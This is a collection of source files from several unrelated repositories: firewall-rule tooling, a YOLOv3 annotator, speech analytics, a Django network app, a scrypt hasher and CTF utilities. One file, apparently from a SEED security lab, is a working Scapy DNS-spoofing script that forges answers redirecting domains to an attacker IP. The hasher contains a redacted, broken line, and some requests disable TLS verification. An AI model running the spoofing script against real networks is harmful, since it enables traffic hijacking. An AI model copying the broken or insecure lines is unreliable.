return {"policy_id": response.json()["items"][0]["id"], "headers": headers}
def get_access_rule(fmc_token, policy_id):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies/{policy_id["policy_id"]}/accessrules'
url = "https://" + args.addr + api_uri
response = requests.get(
url + "?expanded=true",
headers=policy_id["headers"],
verify=False
)
return response.json()["items"]
rule_ids = []
rule_names = []
def find_rule(networks, access_rule):
for i in access_rule:
if networks in i:
key_object("literals", "value", networks, i)
key_object("objects", "id", networks, i)
def key_object(object_type, field, networks, i):
if object_type in i[networks]:
for k in i[networks][object_type]:
if k[field] in args.ip:
rule_ids.append(i["id"])
rule_names.append(i["name"])
def delete_access_rule(fmc_token, policy_id, rule_ids):
api_uri: str = f'/api/fmc_config/v1/domain/{fmc_token["DOMAIN_UUID"]}/policy/accesspolicies/{policy_id["policy_id"]}/accessrules'
url = "https://" + args.addr + api_uri
response = requests.delete(
url + f'?bulk=true&filter=ids%3A{"%2C".join(rule_ids)}',
headers=policy_id["headers"],
verify=False
)
return response.status_code
f = open('/Users/sameersingh/Documents/vitalii/decomission/decommision.csv', 'w')
writer = csv.writer(f)
parser = createParser()
args = parser.parse_args()
fmc_token = fmc_gen_token()
policy_id = get_policy_assignment(fmc_token)
access_rule = get_access_rule(fmc_token, policy_id)
find_rule("sourceNetworks", access_rule)
find_rule("destinationNetworks", access_rule)
rule_ids = list(set(rule_ids))
print("Following rules have been identified to contain the provided IP Address or Object ID")
writer.writerow(["Following rules have been identified to contain the provided IP Address"])
print(rule_names)
for r in rule_names:
writer.writerow([r])
if args.delete == True:
status_code = delete_access_rule(fmc_token, policy_id, rule_ids)
print(status_code)
f.close()
```
#### File: Deployment_Manager/templates/ftd.py
```python
def GenerateConfig(context):
resources = []
# Enabling services
services = {
'name': 'enable_services',
'type': 'enable_services.py',
'properties': {
'services': context.properties['services']
}
}
# Service Account
sa = {
'name': 'service_accounts',
'type': 'service_accounts.py',
'properties': {
'account_id': context.properties['account_id'],
'display_name': context.properties['display_name']
},
'metadata': {
'dependsOn': ['enable_services']
}
}
# Networking provisioning
networking = {
'name': 'networking',
'type': 'networking.py',
'properties': {
'region': context.properties['region'],
'networks': context.properties['networks'],
'mgmt_network': context.properties['mgmt_network'],
'outside_network': context.properties['outside_network'],
'inside_network': context.properties['inside_network'],
'dmz_network': context.properties['dmz_network'],
'custom_route_tag': context.properties['custom_route_tag'],
# Using email from service_account's output
'service_account': '$(ref.service_accounts.email)'
}
}
# Appliance VMs
vm = {
'name': 'vm',
'type': 'vm.py',
'properties': {
'networks': context.properties['networks'],
'vm_zones': context.properties['vm_zones'],
'num_instances': context.properties['num_instances'],
'hostname': context.properties['hostname'],
'cisco_product_version': context.properties['cisco_product_version'],
'vm_machine_type': context.properties['vm_machine_type'],
'vm_instance_labels': context.properties['vm_instance_labels'],
'vm_instance_tags': context.properties['vm_instance_tags'],
'admin_ssh_pub_key': context.properties['admin_ssh_pub_key'],
'admin_password': context.properties['admin_password'],
'day_0_config': context.properties['day_0_config'],
'service_account': '$(ref.service_accounts.email)',
},
'metadata': {
'dependsOn': ['networking']
}
}
# Prepare all resources to be provisioned
resources += [services, sa, networking, vm]
outputs = [{
'name': 'vm_urls',
'value': '$(ref.vm.instance_urls)'
},{
'name': 'vm_external_ips',
'value': '$(ref.vm.vm_external_ips)'
}]
return {'resources': resources, 'outputs': outputs}
```
#### File: templates/helpers/common.py
```python
import random
import string
INSTANCE_TYPE = 'compute.v1.instance'
ADD_INSTANCES_TYPE = 'gcp-types/compute-v1:compute.instanceGroups.addInstances'
INSTANCE_GROUP_TYPE = 'compute.v1.instanceGroup'
REGION_BACKEND_SERVICES_TYPE = 'compute.v1.regionBackendServices'
REGION_HEALTH_CHECKS_TYPE = 'compute.v1.regionHealthChecks'
TCP_PROTOCOL = 'tcp'
NETWORK_TYPE = 'compute.v1.network'
SUBNETWORK_TYPE = 'compute.v1.subnetwork'
FIREWALL_TYPE = 'compute.v1.firewall'
FORWARDING_RULE_TYPE = 'compute.v1.forwardingRule'
COMPUTE_URL_BASE = 'https://www.googleapis.com/compute/v1/'
AUTH_URL_BASE = 'https://www.googleapis.com/auth/'
def getSubnetName(network_name):
return f"{network_name}-subnet-01"
def getHealthCheckName(prefix, sufix):
return f"{prefix}-health-check-{sufix}"
def getInstanceName(prefix, index):
return f'{prefix}-{index}'
def getInstanceGroupName(prefix, index):
return f'{prefix}-{index}'
def Ref(name):
return f'$(ref.{name}.selfLink)'
def RefGroup(name):
return '$(ref.{name}.instanceGroup)'
def randomString(length=5):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def randomizeName(name):
return f'{name}-{randomString()}'
``` |
{
"source": "1337235931/tensorflow-bee-yolov3_lastversion",
"score": 2
} |
#### File: 1337235931/tensorflow-bee-yolov3_lastversion/test.py
```python
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import cv2
import numpy as np
import core.utils as utils
import tensorflow as tf
import re
from PIL import Image
import xml.etree.ElementTree as ET
from xml.etree import ElementTree # 导入ElementTree模块
return_elements = ["input/input_data:0", "pred_sbbox/concat_2:0", "pred_mbbox/concat_2:0",
"pred_lbbox/concat_2:0"]
pb_file = "./yolov3_bee.pb"
dirpath = './VOC2007/JPEGImages/'
xmlpath = './VOC2007/Annotations/'
def isimage(fn):
return os.path.splitext(fn)[-1] in (
'.jpg', '.JPG', '.png', '.PNG')
def main():
imagelist = []
for r, ds, fs in os.walk(dirpath):
for fn in fs:
if not isimage(fn):
continue
fname = os.path.join(r, fn)
name = os.path.splitext(fname)[0][21:32]
print(name +'.jpg')
image_path = fname
num_classes = 1
input_size = 608
graph = tf.Graph()
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image_size = original_image.shape[:2]
image_data = utils.image_preporcess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...]
return_tensors = utils.read_pb_return_tensors(graph, pb_file, return_elements)
with tf.Session(graph=graph) as sess:
pred_sbbox, pred_mbbox, pred_lbbox = sess.run(
[return_tensors[1], return_tensors[2], return_tensors[3]],
feed_dict={return_tensors[0]: image_data})
# print(pred_sbbox.shape)
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + num_classes)),
np.reshape(pred_mbbox, (-1, 5 + num_classes)),
np.reshape(pred_lbbox, (-1, 5 + num_classes))], axis=0)
bboxes = utils.postprocess_boxes(pred_bbox, original_image_size, input_size, 0.3)
# bndbox = np.round(bboxes)
# bndbox = bboxes
# print(bndbox[0:4])
bboxes = utils.nms(bboxes, 0.45, method='nms')
n = len(bboxes)
i = 0
l = []
for i in range(n):
bndbox = np.round(bboxes[i])
# bndbox = int(bnd[:,:4])
#print(int(bndbox[0]), int(bndbox[1]), int(bndbox[2]), int(bndbox[3]))
xi = int(bndbox[0])
yi = int(bndbox[1])
xa = int(bndbox[2])
ya = int(bndbox[3])
z = [xi,yi,xa,ya]
l.append(z)
print(l)
m = l[i][0]
o = l[i][1]
q = l[i][2]
v = l[i][3]
filename = image_path
img = Image.open(filename)
imgname = name + '.jpg'
imgSize = img.size # 图片的长和宽
maxSize = max(imgSize) # 图片的长边
minSize = min(imgSize) # 图片的短边
# 设置为自己Annotations保存路径
########################## 创建xml文件 ################################
a = ET.Element("annotation") # 创建根节点
b = ET.SubElement(a, "folder") # 创建子节点,并添加数据
b.text = "bees"
c = ET.SubElement(a, "filename") # 创建子节点,并添加数据
c.text = imgname
d = ET.SubElement(a, "path") # 创建子节点,并添加数据
d.text = fname
e = ET.SubElement(a, "source") # 创建子节点,并添加数据
e1 = ET.SubElement(e, "database")
e1.text = "Unknown"
f = ET.SubElement(a, "size") # 创建子节点,并添加数据
f1 = ET.SubElement(f, "width")
f1.text = str(maxSize)
f2 = ET.SubElement(f, "height")
f2.text = str(minSize)
f3 = ET.SubElement(f, "depth")
f3.text = "3"
g = ET.SubElement(a, "segmented") # 创建子节点,并添加数据
g.text = "0"
if i ==0:
h = ET.SubElement(a, "object") # 创建子节点,并添加数据
h1 = ET.SubElement(h, "name")
h1.text = "bee"
h2 = ET.SubElement(h, "pose")
h2.text = "Unspecified"
h3 = ET.SubElement(h, "truncated")
h3.text = "0"
h4 = ET.SubElement(h, "difficult")
h4.text = "0"
h5 = ET.SubElement(h, "bndbox")
h5_1 = ET.SubElement(h5, "xmin")
h5_1.text = str(m)
h5_2 = ET.SubElement(h5, "ymin")
h5_2.text = str(o)
h5_3 = ET.SubElement(h5, "xmax")
h5_3.text = str(q)
h5_4 = ET.SubElement(h5, "ymax")
h5_4.text = str(v)
tree = ET.ElementTree(a) # 创建elementtree对象,写文件
tree.write(xmlpath + name + '.xml')
########################## 修改XML ###################################
if i > 0:
updateTree = ET.parse(xmlpath + name + '.xml') # 读取待修改文件
annotation = updateTree.getroot()
j = ET.Element("object") # 创建新节点并添加为root的子节点
annotation.append(j) # 更新xml
h1 = ET.SubElement(j, "name")
h1.text = "bee"
h2 = ET.SubElement(j, "pose")
h2.text = "Unspecified"
h3 = ET.SubElement(j, "truncated")
h3.text = "0"
h4 = ET.SubElement(j, "difficult")
h4.text = "0"
h5 = ET.SubElement(j, "bndbox")
h5_1 = ET.SubElement(h5, "xmin")
h5_1.text = str(m)
h5_2 = ET.SubElement(h5, "ymin")
h5_2.text = str(o)
h5_3 = ET.SubElement(h5, "xmax")
h5_3.text = str(q)
h5_4 = ET.SubElement(h5, "ymax")
h5_4.text = str(v)
updateTree.write(xmlpath + name + '.xml') # 写回原文件
def pretty_xml(element, indent, newline, level=0): # elemnt为传进来的Elment类,参数indent用于缩进,newline用于换行
if element: # 判断element是否有子元素
if (element.text is None) or element.text.isspace(): # 如果element的text没有内容
element.text = newline + indent * (level + 1)
else:
element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * (
level + 1)
# else: # 此处两行如果把注释去掉,Element的text也会另起一行
# element.text = newline + indent * (level + 1) + element.text.strip() + newline + indent * level
temp = list(element) # 将element转成list
for subelement in temp:
if temp.index(subelement) < (len(temp) - 1): # 如果不是list的最后一个元素,说明下一个行是同级别元素的起始,缩进应一致
subelement.tail = newline + indent * (level + 1)
else: # 如果是list的最后一个元素, 说明下一行是母元素的结束,缩进应该少一个
subelement.tail = newline + indent * level
pretty_xml(subelement, indent, newline, level=level + 1) # 对子元素进行递归操作
tree = ElementTree.parse(xmlpath + name + '.xml') # 解析movies.xml这个文件
root = tree.getroot() # 得到根元素,Element类
pretty_xml(root, '\t', '\n') # 执行美化方法
tree.write(xmlpath + name + '.xml')
#print(fname)
#imagelist.append(fname)
if not imagelist:
print('image not found')
return
if __name__ == '__main__':
main()
``` |
{
"source": "1337536723/SEED-labs",
"score": 3
} |
#### File: SEED-labs/DNS_local/attacker32.py
```python
from scapy.all import*
def spoof_dns(pkt):
if (DNS in pkt and 'www.example.net' in pkt[DNS].qd.qname):
# Swap the source and destination IP address
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
# Swap the source and destination port number
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
# The Answer Section
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',
ttl=259200, rdata='10.0.2.5')
# The Authority Section
NSsec1 = DNSRR(rrname='example.net', type='NS',
ttl=259200, rdata='attacker32.com')
NSsec2 = DNSRR(rrname='example.net', type='NS',
ttl=259200, rdata='ns.example.net')
# The Additional Section
Addsec1 = DNSRR(rrname='attacker32.com', type='A',
ttl=259200, rdata='172.16.31.10')
Addsec2 = DNSRR(rrname='ns.example.net', type='A',
ttl=259200, rdata='172.16.31.10')
Addsec3 = DNSRR(rrname='www.facebook.com', type='A',
ttl=259200, rdata='172.16.31.10')
# Construct the DNS packet
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
qdcount=1, ancount=1, nscount=2, arcount=3,
an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2/Addsec3)
# Construct the entire IP packet and send it out
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)
``` |
{
"source": "13375P34Ker/speech_analytics",
"score": 3
} |
#### File: src/asr/vosk_asr.py
```python
import json
import wave
from vosk import KaldiRecognizer, SetLogLevel
SetLogLevel(-1)
def recognize(model, wav_file_path):
"""
Speech to text recognizer for russian speech using vosk models
path to russian vosk model should be configured in config.py file
"""
with wave.open(wav_file_path, "rb") as wf:
if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != "NONE":
raise TypeError("Audio file must be WAV format mono PCM.")
rec = KaldiRecognizer(model, wf.getframerate())
while True:
data = wf.readframes(4000)
if len(data) == 0:
break
rec.AcceptWaveform(data)
json_ = json.loads(rec.FinalResult())
return json_['text']
```
#### File: src/id_channel/identification.py
```python
import re
from pymorphy2 import MorphAnalyzer
marked_phrases = [['Вас приветствует'], ['компания'], ['Страна Экспресс'], ['разговор', 'записываться'],
['разговор', 'запись'],
]
def text_preprocessing(input_text: str) -> str:
input_text = re.sub(r'[^\w\s]', '', input_text)
morph = MorphAnalyzer()
input_words = [morph.parse(word)[0].normal_form for word in input_text.split()]
input_text = ' '.join(input_words)
return input_text
def search_markers(input_text: str) -> int:
input_text = text_preprocessing(input_text)
output = 0
for arr in marked_phrases:
all_elements_in_text = True
for marker in arr:
marker = text_preprocessing(marker)
all_elements_in_text &= (input_text.find(marker) != -1)
if all_elements_in_text:
output += 1
return output
def identify_operator(text1: str, text2: str) -> bool:
"""
:param text1: text of the speech of the first channel
:param text2: text of the speech of the second channel
:return: False if operator's channel is the first; otherwise, it returns True
"""
return search_markers(text1) <= search_markers(text2)
```
#### File: noise_suppression/dataset/mcv.py
```python
from pathlib import Path
from typing import List, Tuple
import numpy as np
import pandas as pd
from src.noise_suppression.dataset._const import NP_RANDOM_SEED
np.random.seed(NP_RANDOM_SEED)
class MCV:
def __init__(self, basepath: Path, val_dataset_size: int) -> None:
self.__basepath: Path = basepath
self.__val_dataset_size: int = val_dataset_size
def __get_filenames(self, df_name: str) -> np.ndarray:
print('Getting MCV metadata...')
metadata: pd.DataFrame = pd.read_csv(self.__basepath / df_name, sep='\t')
files: np.ndarray = metadata['path'].values
np.random.shuffle(files)
return files
def get_train_val_filenames(self) -> Tuple[List[str], List[str]]:
files = [str(self.__basepath / 'clips' / filename) for filename in self.__get_filenames('train.tsv')]
train: List[str] = files[:-self.__val_dataset_size]
val: List[str] = files[-self.__val_dataset_size:]
print(f'Train samples: {len(train)} | Val samples: {len(val)}')
return train, val
def get_test_filenames(self) -> List[str]:
test = [str(self.__basepath / 'clips' / filename) for filename in self.__get_filenames('test.tsv')]
print(f'Test samples: {len(test)}')
return test
```
#### File: noise_suppression/nn/nn_noise_suppressor.py
```python
from pathlib import Path
import librosa
import numpy as np
import torch
from scipy.signal import convolve
from src.noise_suppression.nn._demucs import Demucs
_DEMUCS_CFG = {
'chin': 1,
'chout': 1,
'hidden': 48,
'max_hidden': 10000,
'causal': True,
'glu': True,
'depth': 5,
'kernel_size': 8,
'stride': 4,
'normalize': True,
'resample': 4,
'growth': 2,
'rescale': 0.1,
}
class NeuralNetworkNoiseSuppressor:
def __init__(self, weights_path: Path) -> None:
checkpoint = torch.load(weights_path)
self.__model = Demucs(**_DEMUCS_CFG)
self.__model.load_state_dict(checkpoint)
self.__filter = [0.5, 0.75, 1, 0.75, 0.5]
def suppress(self, audio_path: Path, sample_rate: int, device: str = 'cpu'):
signal, sr = librosa.load(audio_path, sample_rate)
signal = convolve(signal, self.__filter, mode='same')
signal /= np.max(np.abs(signal))
signal_torch = torch.tensor(signal, dtype=torch.float32).unsqueeze(0)
if device == 'cuda':
signal_torch = signal_torch.to(device)
self.__model.to(device)
signal = self.__enhance(signal_torch.unsqueeze(0), device).numpy()
signal /= np.max(np.abs(signal))
return signal, sr
def __enhance(self, noisy_mix, device: str, sample_len: int = 16384):
padded_length = 0
if noisy_mix.size(-1) % sample_len != 0:
padded_length = sample_len - (noisy_mix.size(-1) % sample_len)
noisy_mix = torch.cat(
[noisy_mix, torch.zeros(size=(1, 1, padded_length), device=device)], dim=-1
)
assert noisy_mix.size(-1) % sample_len == 0 and noisy_mix.dim() == 3
noisy_chunks = list(torch.split(noisy_mix, sample_len, dim=-1))
noisy_chunks = torch.cat(noisy_chunks, dim=0)
enhanced_chunks = self.__model(noisy_chunks).detach().cpu()
enhanced = enhanced_chunks.reshape(-1)
if padded_length != 0:
enhanced = enhanced[:-padded_length]
noisy_mix = noisy_mix[:-padded_length]
return enhanced
```
#### File: src/white_list/white_list.py
```python
import json
import re
from nltk.tokenize import word_tokenize
from pymorphy2 import MorphAnalyzer
def search_phrase(input_text: str, phrase: str) -> bool:
input_text = re.sub(r'[^\w\s]', '', input_text)
phrase = re.sub(r'[^\w\s]', '', phrase)
morph = MorphAnalyzer()
input_words = [morph.parse(word)[0].normal_form for word in input_text.split()]
phrase_words = [morph.parse(word)[0].normal_form for word in phrase.split()]
input_text = ' '.join(input_words)
phrase = ' '.join(phrase_words)
return input_text.find(phrase) != -1
class WhiteCheck:
def __init__(self, file_with_list: str):
"""
:param file_with_list: filename; file with the json extension where the white list is saved
"""
with open(file_with_list, "r", encoding='utf-8') as file:
self.list = json.load(file)
@staticmethod
def search_one_syn_phrase(input_text: str, syn_phrases: list) -> bool:
"""
:param input_text: input text of operator's speech
:param syn_phrases: list of dictionaries with keys: 'phrase' which means one of synonymous phrases, type of
value is str; and 'keywords' which means str with all keywords in phrase, type of value is str;
"""
output = False
for dct in syn_phrases:
if dct['keywords'] == 'all':
output |= search_phrase(input_text, dct['phrase'])
continue
words = word_tokenize(dct['keywords'], language="russian")
all_keywords_in_text = True
for word in words:
all_keywords_in_text &= search_phrase(input_text, word)
output |= all_keywords_in_text
return output
def update_list(self, arr_of_syn_sent: list, file_with_list: str):
"""
:param arr_of_syn_sent: list of dictionaries with keys: 'phrase' which means one of synonymous phrases, type
of value is str; and 'keywords' which means str with all keywords in phrase, type of value is str;
:param file_with_list: filename; file with the json extension where the white list is saved
"""
self.list.append(arr_of_syn_sent)
with open(file_with_list, "w", encoding='utf-8') as file:
json.dump(self.list, file, ensure_ascii=False)
def count_white_phrases(self, input_text: str) -> list:
out_list = []
for arr in self.list:
out_list.append(int(self.search_one_syn_phrase(input_text, arr)))
return out_list
``` |
{
"source": "133794m3r/cs50-web",
"score": 2
} |
#### File: network/network/views.py
```python
from django.contrib.auth import authenticate, login, logout
from django.db import IntegrityError
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from datetime import datetime
from .models import User,Post
from json import loads
def index(request):
posts = list(reversed(Post.objects.all()))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page = paginator.get_page(page_number)
return render(request, "network/index.html",{'page_obj':page,'iterator':paginator.page_range})
def login_view(request):
if request.method == "POST":
# Attempt to sign user in
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(request, username=username, password=password)
# Check if authentication successful
if user is not None:
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/login.html", {
"message": "Invalid username and/or password."
})
else:
return render(request, "network/login.html")
def logout_view(request):
logout(request)
return HttpResponseRedirect(reverse("index"))
def register(request):
if request.method == "POST":
username = request.POST["username"]
email = request.POST["email"]
# Ensure password matches confirmation
password = request.POST["password"]
confirmation = request.POST["confirmation"]
if password != confirmation:
return render(request, "network/register.html", {
"message": "Passwords must match."
})
# Attempt to create new user
try:
user = User.objects.create_user(username, email, password)
user.save()
except IntegrityError:
return render(request, "network/register.html", {
"message": "Username already taken."
})
login(request, user)
return HttpResponseRedirect(reverse("index"))
else:
return render(request, "network/register.html")
@login_required(login_url='login')
def like(request,post_id):
post = Post.objects.get(pk=post_id)
liked = False
if request.user in post.likes.all():
post.likes.remove(request.user)
else:
post.likes.add(request.user)
liked = True
likes = post.likes.count()
return JsonResponse({
'liked':liked,
'likes':likes
})
@login_required(login_url='login')
@require_http_methods(["POST"])
def new_post(request):
if request.POST['content'] == '':
return HttpResponseRedirect(reverse('index'))
Post.objects.create(
username = request.user,
content = request.POST['content'],
datetime = datetime.now()
)
return HttpResponseRedirect(reverse('index'))
def profile(request,username):
user_chosen = User.objects.get(username = username)
posts=list(reversed(user_chosen.posts.all()))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(request, "network/profile.html", {'selected_user':user_chosen, 'page_obj':page_obj, 'pages':paginator.page_range})
#For the edit page I need to make it work with fetch, and have the "new post" section be replaced with their content's and then
#reshow that element with it's default values.
@login_required(login_url='login')
@require_http_methods(["POST","GET"])
def edit(request,post_id):
post = Post.objects.get(pk=post_id)
#can't try to edit someone else's post.
if post.username != request.user:
return HttpResponseRedirect(reverse('index'))
if request.method == "POST":
post.content = request.POST.get("content")
post.save()
return HttpResponseRedirect(reverse('index'))
else:
return render(request,"network/edit.html",{'post':post})
@login_required(login_url='login')
@require_http_methods(["POST","GET"])
def edit_post(request,post_id):
post = Post.objects.get(pk=post_id)
if request.method == "POST" and request.user == post.username:
content = loads(request.body)
post.content = content.get("content")
post.save()
return JsonResponse({'post':post.content})
@login_required(login_url='login')
@require_http_methods(["POST"])
def follow(request,id):
followed = False
chosen_user = User.objects.get(pk=id)
if request.user == chosen_user.username:
followed = False
#otherwise we need to update the counts appropriately.
else:
if request.user in chosen_user.followers.all():
chosen_user.followers.remove(request.user)
else:
chosen_user.followers.add(request.user)
followed = True
return JsonResponse({
'followed':followed,
'followers':chosen_user.followers.count(),
'following':chosen_user.following.count()
})
@login_required(login_url='login')
@require_http_methods(["GET"])
def home(request):
posts = []
for followed_user in request.user.following.all():
for post in followed_user.posts.all():
posts.append(post)
posts = list(reversed(posts))
paginator = Paginator(posts,10)
page_number = request.GET.get('page')
page = paginator.get_page(page_number)
return render(request,'network/home.html',{'page_obj':page,'iterator':paginator.page_range})
```
#### File: capstone_project/capstone_project/hashers.py
```python
import binascii
import hashlib
from django.contrib.auth.hashers import BasePasswordHasher, mask_hash
from django.utils.crypto import (get_random_string, constant_time_compare)
from django.utils.translation import gettext_noop as _
class ScryptPasswordHasher(BasePasswordHasher):
algorithm = 'scrypt'
#Parameters below are basically as high as Python will allow. It should equate to
# around ~75ms on my machine. So on the server it should be ~13 logins/s possible per core.
# So that should be good enough for the server.
# will benchmark on the wimpy server I have to figure it out.
# Current version utilizes ~32MiB of RAM.
#n == 15, and 32MiB of ram means ~67ms per hash have to try on small google server.
n = 15
#may make this be 13. Each number higher results in 2MiB of more memory.
r = 9
p = 1
dklen = 32
#65MiB
maxmem = 68157440
def safe_summary(self, encoded: str) -> dict:
"""
Returns a summary of safe values.
The result is a dictionary that will be used where the password field
must be displayed to construct a safe representation of the password.
:param encoded: The full encoded hash string.
:return: The parameters.
:rtype: dict
:returns: All parameters exploded.
"""
decoded = self.decode(encoded)
return {
_('algorithm'):decoded['algorithm'],
_('n'):decoded['n'],
_('r'):decoded['r'],
_('p'):decoded['p'],
_('dklen'):decoded['dklen'],
_('hash'):mask_hash(decoded['hash']),
_('salt'):mask_hash(decoded['salt'])
}
def encode(self, password: str, salt: str, n: int = None, r: int = None, p: int = None, dklen: int = None) -> str:
"""
Secure password hashing using the scrypt algorithm.
The default parameters are based upon it taking ~60ms
:param password: The password to hash.
:param salt: The salt value to utilize. Default is 16 characters(~98)
:param n: The small n. Aka 1<<n for the iteration count.
:param r: The memory factor to utilize.
:param p: The parellism factor.
:param dklen: how large the output hash should be.
:returns: Hashed string
:rtype: str
"""
#should give ~100bits of entropy. Characters are safe for SQL characterset and programming.
salt =salt or get_random_string(16,'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_+=.')
n = n or self.n
r = r or self.r
p = p or self.p
dklen = dklen or self.dklen
N = 1 << n
password = bytes(password,'<PASSWORD>')
saltb = bytes(salt,'utf-8')
hash = str(binascii.b2a_base64(hashlib.scrypt(password,salt=saltb,n=N,r=r,p=p,dklen=dklen,maxmem=self.maxmem)),'utf-8')
return f"scrypt${salt}${n}${r}${p}${dklen}${hash}"
def decode(self, encoded: str) -> dict:
"""
This method will decode the hash into it's component parts so that it can be verified.
:param encoded: The hashed password you want to decode.
:return: The hash split to all of the values.
:returns: String exploded.
:rtype: dict
"""
algorithm,salt,n,r,p,dklen,hash = encoded.split('$')
assert algorithm == self.algorithm
return {
'algorithm':algorithm,
'salt':salt,
'n':int(n),
'r':int(r),
'p':int(p),
'dklen':int(dklen),
'hash':hash
}
def verify(self, password: str, encoded: str) -> bool:
decoded = self.decode(encoded)
encoded_2 = self.encode(password,decoded['salt'],decoded['n'],decoded['r'],decoded['p'],decoded['dklen'])
return constant_time_compare(encoded,encoded_2)
def must_update(self,encoded):
algorithm,salt,n,r,p,dklen,hash = encoded.split('$')
assert algorithm == self.algorithm
return [self.n,self.r,self.p,self.dklen] != [n,r,p,dklen]
def harden_runtime(self, password, encoded):
#Way too complex to do this honestly.
pass
```
#### File: capstone_project/ctf_club/util.py
```python
from random import randint
# RSA Flags
from .libctf import make_fermat_chal, make_bsa, make_hba, make_rsa, make_common_mod
# Classical Ciphers
from .libctf import make_hill, make_affine
from .libctf import make_masterhacker, make_fizzbuzz
"""
CTFClub Project
By <NAME> <<EMAIL>>
Licensed AGPLv3 Or later (2020)
"""
def make_index(objects):
output = {}
maximum = 0
for challenge in objects:
if challenge.category.name not in output:
output[challenge.category.name] = [challenge]
maximum +=1
else:
#i = categories.index(challenge.category.name)
output[challenge.category.name].append(challenge)
return output
CHALLENGE_FUNCS = {
"fizzbuzz":make_fizzbuzz,
"hba":make_hba,
"fermat":make_fermat_chal,
"hill":make_hill,
"bsa":make_bsa,
"rsa":make_rsa,
"affine":make_affine,
"common_mod":make_common_mod,
"master_hacker":make_masterhacker,
}
CATEGORIES = ["Classical Crypto","Modern Crypto","Programming"]
#TODO: Move all of this into an SQL table that'll actually hold this meta-data for me.
CHALLENGES_TEMPLATES = [
{"name":"<NAME>", "sn":"fizzbuzz", "category":"Programming", "description":
"""This is a basic fizzbuzz challenge where you have to provide a min an maximum number.
The maximum minus 1 is the number that is counted to.""",
"points":75, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Frenchman's Revenge", "sn":"fermat", "category":"Modern Crypto", "description":
"This is an attack on RSA. This challenge is also known as 'Fermat's Near prime' attack."
" Provide the plain-text and the app will do the rest.",
"points":240,"variety":False,"files":False},
{"name":"<NAME>", "sn":"hill", "category":"Classical Crypto", "description":
"This challenge is all about the hill cipher. Select the easy version for one where the user is given the key. "
"The medium mode for when they shouldn't be given the key at the start.",
"points":70, "variety":True,"files":False},
{"name":"Really Simple Algorithm - Intro", "sn":"rsa", "category":"Modern Crypto",
"description":"This challenge is just a simple RSA based challenge that requires the user to decrypt some message.",
"points":150, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Fake it till you make it", "sn":"bsa", "category":"Modern Crypto",
"description":
"This is an attack on RSA called the 'Blind Signature Attack'. To keep it simple we're going to have them work "
"with a message that's already been signed.", "points":225, "variety":False,"files":False},
{"name":"A-fine Cipher", "sn":"affine", "category":"Classical Crypto", "description":
"This challenge is all about the affine cipher which is basically just a 2-step Ceaser Cipher."
" Easy mode gives them the key. Medium mode doesn't give them a key but does give them a crib.",
"points":100, "variety":True,"files":False},
{"name":"Really Simple Algorithm - It's all the Same", "sn":"common_mod", "category":"Modern Crypto",
"description":"This challenge requires someone to carry out a common modulus attack against RSA.",
"points":45, "variety":False,"files":False},
{"name":"Really Simple Algorithm - Leftover Chinese Food", "sn":"hba", "category":"Modern Crypto",
"description":"This challenge requires the solver to utilize the Hastaad Broadcast Attack against RSA.",
"points":300, "variety":False,"files":False},
{"name":"<NAME>", "sn":"master_hacker", "category":"Programming",
"description":"This challenge is the bounded knapsack problem. A staple of algorithm interview questions.",
"points":200, "variety":False,"files":True},
]
def __func():
CHALLENGES_TEMPLATES_NAMES = {}
for i,chal in enumerate(CHALLENGES_TEMPLATES):
CHALLENGES_TEMPLATES_NAMES[chal['name']] = [chal['sn'],i]
return CHALLENGES_TEMPLATES_NAMES
CHALLENGES_TEMPLATES_NAMES = __func()
def jsonify_queryset(queryset: object) -> dict:
"""
jsonify_queryset will take a queryset object from the Django.models result
and return a list of dicts that are ready to be serialized into JSON for
the use by the API and consumed by the client.
:param queryset: The object we're working with. May already be a dict.o
:return: {dict} A dict that's ready to be serialized as JSON.
"""
out = []
if type(queryset) is dict:
return queryset
elif len(queryset) > 1:
for result in queryset:
if type(result) is dict:
out.append(result)
else:
out.append(result.to_dict())
else:
try:
if queryset.count() == 1:
tmp = queryset.first()
if type(tmp) is dict:
return tmp
else:
return tmp.to_dict()
except AttributeError:
return queryset.to_dict()
return out
def rot_encode(msg):
shift = randint(1,25)
out = ''
for c in msg:
x = ord(c)
if 65 <= x <= 90:
#add the shift.
x+=shift
#if it's greater than 'Z'.
if x>=90:
#handle overflows.
x=(x-90)+64
#else if it's lowercase ascii.
elif 97 <= x <= 122:
#same thing again.
x+=shift
#same if it's greater than 'z'.
if x>=122:
#handle overflow.
x=(x-122)+96
out += chr(x)
return out
#since this is a ctf site I'll have them solve a simple ceaser cipher message along with a basic math question.
def make_rot_captcha():
translation = {'A':['Alpha','Afirm','Able'],
'B':['Bravo','Baker','Buy'],
'C':['Charlie','Charlie','Cast'],
'D':['Delta','Dog','Dock'],
'E':['Echo','Easy','Easy'],
'F':['Foxtrot','Fox','France'],
'G':['Golf','George','Greece'],
